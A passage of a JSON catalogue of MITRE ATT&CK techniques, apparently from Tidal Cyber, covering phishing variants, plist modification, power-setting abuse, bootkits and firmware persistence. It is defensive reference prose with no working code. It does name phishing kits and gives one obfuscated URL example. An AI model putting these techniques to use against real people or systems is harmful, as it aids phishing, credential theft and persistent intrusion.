"dest-uuid": "0fa8230a-fd97-4e2c-9923-923044af4291",
"type": "similar"
}
],
"uuid": "f9d61206-3063-4d04-b06f-225f4766bff1",
"value": "Permission Groups Discovery"
},
{
"description": "Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1566.001"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291",
"value": "Spearphishing Attachment - Duplicate"
},
{
"description": "Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place.\n\nAdversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly. Additionally, adversaries may use seemingly benign links that abuse special characters to mimic legitimate websites (known as an \"IDN homograph attack\").<sup>[[CISA IDN ST05-016](https://app.tidalcyber.com/references/3cc2c996-10e9-4e25-999c-21dc2c69e4af)]</sup> URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>\n\nAdversaries may also utilize links to perform consent phishing, typically with OAuth 2.0 request URLs that when accepted by the user provide permissions/access for malicious applications, allowing adversaries to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s.<sup>[[Trend Micro Pawn Storm OAuth 2017](https://app.tidalcyber.com/references/7d12c764-facd-4086-acd0-5c0287344520)]</sup> These stolen access tokens allow the adversary to perform various actions on behalf of the user via API calls. <sup>[[Microsoft OAuth 2.0 Consent Phishing 2021](https://app.tidalcyber.com/references/393e44fe-cf52-4c39-a79f-f7cdd9d8e16a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1566.002"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d",
"value": "Spearphishing Link - Duplicate"
},
{
"description": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.\n\nA common example is to build rapport with a target via social media, then send content to a personal webmail service that the target uses on their work computer. This allows an adversary to bypass some email restrictions on the work account, and the target is more likely to open the file since it's something they were expecting. If the payload doesn't work as expected, the adversary can continue normal communications and troubleshoot with the target on how to get it working.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1566.003"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "165ba336-3eab-4809-b6fd-d0dcc5478f7f",
"value": "Spearphishing via Service"
},
{
"description": "Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries are not directly sending malware to a victim vice relying on [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) for delivery and execution. For example, victims may receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools ([Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430)) onto their computer.<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>\n\nAdversaries may also combine voice phishing with [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289) in order to trick users into divulging MFA credentials or accepting authentication prompts.<sup>[[Proofpoint Vishing](https://app.tidalcyber.com/references/7a200d34-b4f3-5036-8582-23872ef27eb1)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1566.004"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
}
],
"uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1",
"value": "Spearphishing Voice - Duplicate"
},
{
"description": "Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.\n\nAdversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup> Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nVictims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,<sup>[[sygnia Luna Month](https://app.tidalcyber.com/references/3e1c2a64-8446-538d-a148-2de87991955a)]</sup><sup>[[CISA Remote Monitoring and Management Software](https://app.tidalcyber.com/references/1ee55a8c-9e9d-520a-a3d3-1d2da57e0265)]</sup> or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872)).<sup>[[Unit42 Luna Moth](https://app.tidalcyber.com/references/ec52bcc9-6a56-5b94-8534-23c8e7ce740f)]</sup>",
"meta": {
"platforms": [
"Google Workspace",
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c",
"type": "uses"
},
{
"dest-uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291",
"type": "similar"
},
{
"dest-uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d",
"type": "similar"
},
{
"dest-uuid": "165ba336-3eab-4809-b6fd-d0dcc5478f7f",
"type": "similar"
},
{
"dest-uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1",
"type": "similar"
}
],
"uuid": "d4a36624-50cb-43d3-95af-a2e10878a533",
"value": "Phishing"
},
{
"description": "Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.<sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1598.002"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "b18ddaf9-2939-45db-8b2a-2edecc2097ac",
"value": "Spearphishing Attachment"
},
{
"description": "Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.<sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup> The given website may be a clone of a legitimate site (such as an online or corporate login portal) or may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. URLs may also be obfuscated by taking advantage of quirks in the URL schema, such as the acceptance of integer- or hexadecimal-based hostname formats and the automatic discarding of text before an “@” symbol: for example, `hxxp://google.com@1157586937`.<sup>[[Mandiant URL Obfuscation 2023](https://app.tidalcyber.com/references/b63f5934-2ace-5326-89be-7a850469a563)]</sup>\n\nAdversaries may also link to \"web bugs\" or \"web beacons\" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.<sup>[[NIST Web Bug](https://app.tidalcyber.com/references/b4362602-faf0-5b28-a147-b3153da1903f)]</sup>\n\nAdversaries may also be able to spoof a complete website using what is known as a \"browser-in-the-browser\" (BitB) attack. By generating a fake browser popup window with an HTML-based address bar that appears to contain a legitimate URL (such as an authentication portal), they may be able to prompt users to enter their credentials while bypassing typical URL verification methods.<sup>[[ZScaler BitB 2020](https://app.tidalcyber.com/references/c2f01a3b-a164-59b7-be5d-5eec4eb69ee5)]</sup><sup>[[Mr. D0x BitB 2022](https://app.tidalcyber.com/references/447f6b34-ac3a-58d9-af96-aa1d947a3e0e)]</sup>\n\nAdversaries can use phishing kits such as `EvilProxy` and `Evilginx2` to proxy the connection between the victim and the legitimate website. On a successful login, the victim is redirected to the legitimate website, while the adversary captures their session cookie (i.e., [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e)) in addition to their username and password. This may enable the adversary to then bypass MFA via [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1).<sup>[[Proofpoint Human Factor](https://app.tidalcyber.com/references/143e191f-9175-557b-8fe1-41dbe04867a6)]</sup>\n\nFrom the fake website, information is gathered in web forms and sent to the adversary. Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1598.003"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "4a68c72c-79c1-4fed-9107-75bb5b06dfc3",
"value": "Spearphishing Link"
},
{
"description": "Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages.\n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup> These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to craft persuasive and believable lures.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1598.001"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "7f953df5-c91f-4975-a579-2be3c89bca7e",
"value": "Spearphishing Service"
},
{
"description": "Adversaries may use voice communications to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Impersonation](https://app.tidalcyber.com/technique/20417e43-6ffa-5d36-a2ef-e27cd5a4b8f1)) and/or creating a sense of urgency or alarm for the recipient.\n\nAll forms of phishing are electronically delivered social engineering. In this scenario, adversaries use phone calls to elicit sensitive information from victims. Known as voice phishing (or \"vishing\"), these communications can be manually executed by adversaries, hired call centers, or even automated via robocalls. Voice phishers may spoof their phone number while also posing as a trusted entity, such as a business partner or technical support staff.<sup>[[BOA Telephone Scams](https://app.tidalcyber.com/references/ee1abe19-f38b-5127-8377-f13f57f2abcb)]</sup>\n\nVictims may also receive phishing messages that direct them to call a phone number (\"callback phishing\") where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>\n\nAdversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)) to tailor pretexts to be even more persuasive and believable for the victim.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1598.004"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
}
],
"uuid": "113b8750-d166-5cac-bd26-2c82c90b9d88",
"value": "Spearphishing Voice"
},
{
"description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.<sup>[[ThreatPost Social Media Phishing](https://app.tidalcyber.com/references/186c1213-d0c5-4eb6-aa0f-0fd61b07a1f7)]</sup><sup>[[TrendMictro Phishing](https://app.tidalcyber.com/references/621f1c52-5f34-4293-a507-b58c4084a19b)]</sup><sup>[[PCMag FakeLogin](https://app.tidalcyber.com/references/f652524c-7950-4a8a-9860-0e658a9581d8)]</sup><sup>[[Sophos Attachment](https://app.tidalcyber.com/references/b4aa5bf9-31db-42ee-93e8-a576ecc00b57)]</sup><sup>[[GitHub Phishery](https://app.tidalcyber.com/references/6da51561-a813-4802-aa84-1b3de1bc2e14)]</sup> Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.<sup>[[Avertium callback phishing](https://app.tidalcyber.com/references/abeb1146-e5e5-5ecc-9b70-b348fba097f6)]</sup>\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing<sup>[[Proofpoint-spoof](https://app.tidalcyber.com/references/fe9f7542-bbf0-5e34-b3a9-8596cc5aa754)]</sup> the identity of the sender which can be used to fool both the human recipient as well as automated security tools.<sup>[[cyberproof-double-bounce](https://app.tidalcyber.com/references/4406d688-c392-5244-b438-6995f38dfc61)]</sup> \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://app.tidalcyber.com/technique/01505d46-8675-408d-881e-68f4d8743d47)).<sup>[[Microsoft OAuth Spam 2022](https://app.tidalcyber.com/references/086c06a0-3960-5fa8-b034-cef37a3aee90)]</sup><sup>[[Palo Alto Unit 42 VBA Infostealer 2014](https://app.tidalcyber.com/references/c3eccab6-b12b-513a-9a04-396f7b3dcf63)]</sup>",
"meta": {
"platforms": [
"PRE"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e",
"type": "uses"
},
{
"dest-uuid": "b18ddaf9-2939-45db-8b2a-2edecc2097ac",
"type": "similar"
},
{
"dest-uuid": "4a68c72c-79c1-4fed-9107-75bb5b06dfc3",
"type": "similar"
},
{
"dest-uuid": "7f953df5-c91f-4975-a579-2be3c89bca7e",
"type": "similar"
},
{
"dest-uuid": "113b8750-d166-5cac-bd26-2c82c90b9d88",
"type": "similar"
}
],
"uuid": "b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06",
"value": "Phishing for Information"
},
{
"description": "Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the <code>info.plist</code> file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.<sup>[[fileinfo plist file description](https://app.tidalcyber.com/references/24331b9d-68af-4db2-887f-3a984b6c5783)]</sup> \n\nAdversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://app.tidalcyber.com/technique/5e8b76ce-b75f-449c-9d8f-573b1ffdb2bd)) or running additional commands for persistence (ex: [Launch Agent](https://app.tidalcyber.com/technique/6dbe030c-5f87-4b45-9b6b-5bba2c0fad00)/[Launch Daemon](https://app.tidalcyber.com/technique/eff618a9-6498-4b01-bca1-cd5f3784fc27) or [Re-opened Applications](https://app.tidalcyber.com/technique/9459a27a-b892-4864-9916-814130bea485)).\n\nFor example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the <code>LSUIElement</code> key in an applications <code>info.plist</code> file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as <code>LSEnvironment</code>, to enable persistence via [Dynamic Linker Hijacking](https://app.tidalcyber.com/technique/b0d884c3-cf87-4610-992d-4ec54c667759).<sup>[[wardle chp2 persistence](https://app.tidalcyber.com/references/3684bacb-24cb-4467-b463-d0d3f5075c5c)]</sup><sup>[[eset_osx_flashback](https://app.tidalcyber.com/references/ce6e5a21-0063-4356-a77a-5c5f9fd2cf5c)]</sup>",
"meta": {
"platforms": [
"macOS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ee177ad0-d282-42c0-91f9-7bcf724e3d31",
"value": "Plist File Modification"
},
{
"description": "Adversaries may impair a system's ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.<sup>[[Sleep, shut down, hibernate](https://app.tidalcyber.com/references/e9064801-0297-51d0-9089-db58f4811a9f)]</sup>\n\nAdversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.<sup>[[Microsoft: Powercfg command-line options](https://app.tidalcyber.com/references/d9b5be77-5e44-5786-a683-82642b8dd8c9)]</sup><sup>[[systemdsleep Linux](https://app.tidalcyber.com/references/9537f6f9-1521-5c21-b14f-ac459a2d1b70)]</sup>\n\nFor example, `powercfg` controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.<sup>[[Two New Monero Malware Attacks Target Windows and Android Users](https://app.tidalcyber.com/references/a797397b-2af7-58b9-b66a-5ded260659f0)]</sup> Adversaries may also extend system lock screen timeout settings.<sup>[[BATLOADER: The Evasive Downloader Malware](https://app.tidalcyber.com/references/53e12ade-99ed-51ee-b5c8-32180f144658)]</sup> Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.<sup>[[CoinLoader: A Sophisticated Malware Loader Campaign](https://app.tidalcyber.com/references/83469ab3-0199-5679-aa25-7b6885019552)]</sup>\n\nAware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.<sup>[[Condi-Botnet-binaries](https://app.tidalcyber.com/references/a92b0d6c-b3e8-56a4-b1b4-1d117e59db84)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Network",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
}
],
"uuid": "0719ea2b-d630-5ada-9b04-c3136ff530ae",
"value": "Power Settings"
},
{
"description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). <sup>[[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)]</sup> The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. <sup>[[Lau 2011](https://app.tidalcyber.com/references/fa809aab-5051-4f9c-8e27-b5989608b03c)]</sup>\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1542.003"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "032985de-5e09-4889-b8c4-84d940c6346c",
"value": "Bootkit"
},
{
"description": "Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://app.tidalcyber.com/technique/4050dbda-5cb0-4bd6-8444-841e55611f3a) but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\n\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1542.002"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "764041d4-ff10-45d0-b42e-2f23ca334740",
"value": "Component Firmware"
},
{
"description": "Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>\n\n\nROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1542.004"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "b9d60848-388e-444c-9f22-2267ea61b5e9",
"value": "ROMMONkit"
},
{
"description": "Adversaries may modify system firmware to persist on systems.The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer. <sup>[[Wikipedia BIOS](https://app.tidalcyber.com/references/0c4a2cb3-d663-47ee-87af-c5e9e68fe15f)]</sup> <sup>[[Wikipedia UEFI](https://app.tidalcyber.com/references/681c6a57-76db-410b-82d6-4e614bcdb6e0)]</sup> <sup>[[About UEFI](https://app.tidalcyber.com/references/2e6fe82c-d90f-42b6-8247-397ab8823c7c)]</sup>\n\nSystem firmware like BIOS and (U)EFI underly the functionality of a computer and may be modified by an adversary to perform or assist in malicious activity. Capabilities exist to overwrite the system firmware, which may give sophisticated adversaries a means to install malicious firmware updates as a means of persistence on a system that may be difficult to detect.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1542.001"
},
"related": [
{
"dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "4050dbda-5cb0-4bd6-8444-841e55611f3a",
"value": "System Firmware"
},
{
